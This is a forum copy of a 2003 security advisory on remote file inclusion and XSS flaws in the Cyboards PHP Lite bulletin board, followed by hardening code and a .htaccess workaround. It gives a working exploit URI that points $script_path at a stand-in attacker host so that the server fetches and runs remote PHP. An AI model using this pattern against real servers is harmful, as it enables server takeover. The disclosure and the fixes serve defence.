
View Full Version : Cyboards Remote Code Execution



mindwarper@hush.com
21/01/03, 06:40
Cyboards PHP Lite Vulnerability ( By Mindwarper :: mindwarper@hush.com :: )

<------- ------->

----------------------
Vendor Information:
----------------------


Homepage : http://www.gold-sonata.com
Vendor : informed
Mailed advisory: 13/01/03
Vendor Response : None yet (possibly because they have no contact page and the report
was sent to abuse@gold-sonata.com)

----------------------
Affected Versions:
----------------------


1.25 and prior
(tested on 1.25 and 1.21)


----------------------
Description:
----------------------

Cyboards PHP Lite is a free, open-source bulletin board written in PHP. A couple of
vulnerabilities in the /include directory allow a remote attacker to execute arbitrary
code on the server with the permissions of the web server user. Another vulnerability,
reachable through files in /include (and several admin form files listed below), may allow
an attacker to hijack other members' accounts through cross-site scripting (XSS).

----------------------
Exploit:
----------------------

XSS:

Possible in the following files and possibly more:

include/default_header.php
include/options_form.php
adminopts/login_form.php
adminopts/include/ban_form.php
adminopts/include/board_form.php
adminopts/include/login_form.php
adminopts/include/vip_form.php


Remote Arbitrary Code Execution:

Several files inside the include directory do not check that they were loaded by another
forum script and can therefore be requested directly. They build include() paths from the
$script_path variable, which the including script is supposed to set but which a direct
request lets the remote user set instead. The result is that an attacker can make the
server fetch and run arbitrary code hosted on a machine they control.

1. include/default_header.php

-- This file looks something like this --
****************
...

if(isset($board_config["stylesheet"])&&(trim($board_config["stylesheet"])!="")) {
echo "<LINK REL=STYLESHEET HREF='".$board_config["stylesheet"]."' TYPE='text/css'>\n\n";
} else {
echo "<style>\n";
include("$script_path/include/default_style.css");
echo "\n</style>";
}

...

****************

When default_header.php is requested directly, $board_config["stylesheet"] is not set,
because the forum script that normally defines it has not run. Execution therefore falls
into the else branch and reaches include("$script_path/include/default_style.css").
$script_path is equally unset, so the attacker supplies it in the query string (PHP's
register_globals, where enabled, turns the query-string parameter into the global
$script_path). By creating a directory called include on their own server and placing PHP
code in a file named default_style.css inside it, the attacker makes the server include
that remote file instead of the local stylesheet. include() parses whatever it fetches as
PHP regardless of the .css extension, so the attacker's code runs on the server. The URI
looks something like this:

http://victim/forum/include/default_header.php?script_path=http://attacker

where the attacker has created a directory called /include containing a file called
default_style.css with the malicious code.


2. include/options_form.php

Contains the following code on its first line:

---=---
<? include("$script_path/lang/$lang_code/".$lang_code."_options.php"); ?>
---=---

The same technique applies here: with $script_path pointing at the attacker's host, the
server fetches and runs lang/<lang_code>/<lang_code>_options.php from there, and the
attacker controls $lang_code as well when the file is called directly.



Note: An attacker can use this for an XSS attack as well, but given the possibility of
running remote code on the server it is more probable that he/she will use it for remote
code execution.
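Both includes above fail for the same reason: the include path starts with $script_path,
which the including script is supposed to set but which a direct request (with
register_globals enabled) lets the client set instead. The following is an added example,
not code from Cyboards or from the advisory author, showing how a file such as
include/options_form.php can be hardened; the same three measures carry over to
include/default_header.php. The guard constant IN_CYBOARDS and the default language
directory "english" are assumptions made for the example, not names Cyboards ships.

```php
<?php
// Added example (not Cyboards code): a hardened replacement for the first
// line of include/options_form.php. The same measures apply to
// include/default_header.php and the other files under include/.
//
// Assumptions (not from the advisory): the board's entry scripts run
//   define('IN_CYBOARDS', true);
// before including anything, and a language directory lang/english exists.

// 1. Refuse direct requests. A file reached through another script sees the
//    guard constant; a file requested straight from the browser does not,
//    and exits before any include() path is built.
if (!defined('IN_CYBOARDS')) {
    header('HTTP/1.0 403 Forbidden');
    exit('This file cannot be called directly.');
}

// 2. Do not take the include prefix from a variable the client may own.
//    With register_globals on, an unset $script_path becomes whatever
//    ?script_path=... says; deriving it from __FILE__ removes that choice.
$script_path = dirname(dirname(__FILE__));   // forum root, parent of include/

// 3. Allow-list what still comes from the request or from user settings. A
//    language code only ever needs to match an installed lang/<code>/
//    directory, so restrict it to a short token and check the filesystem.
function safe_lang_code($candidate, $script_path)
{
    // Letters and underscores only: no '/', '.', ':' or NUL, so neither
    // "../" nor "http://" can be smuggled into the include path.
    if (!preg_match('/^[A-Za-z_]{2,16}$/', $candidate)) {
        return 'english';                    // assumed default language
    }
    if (!is_dir("$script_path/lang/$candidate")) {
        return 'english';
    }
    return $candidate;
}

// $lang_code is normally set by the including script from the member's
// preferences; it is untrusted either way, so it is validated here.
$lang_code = safe_lang_code(isset($lang_code) ? $lang_code : 'english', $script_path);

// The include now resolves only below the forum's own lang/ directory.
include("$script_path/lang/$lang_code/" . $lang_code . "_options.php");
?>
```

With the guard in place, the URI shown above (default_header.php?script_path=http://attacker)
receives a 403 before any include() runs, and even a file that is reached legitimately no
longer lets the request choose $script_path. Turning register_globals off in PHP removes
the attacker's control of $script_path for the whole board at once, but a board written to
rely on register_globals may stop working, so test that change before deploying it.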


----------------------
Solution:
----------------------

Please check the vendor's website for new patches.

As a temporary workaround, create a .htaccess file containing 'Deny from all' and place
it in the /include directory. Apache will then refuse direct requests for the files in
that directory, while the forum scripts can still include() them from the filesystem.

----------------------
Greetz:
----------------------

Cyon, daemorhedron, Truckle, Methodus, MC187, DJX.

<------- ------->



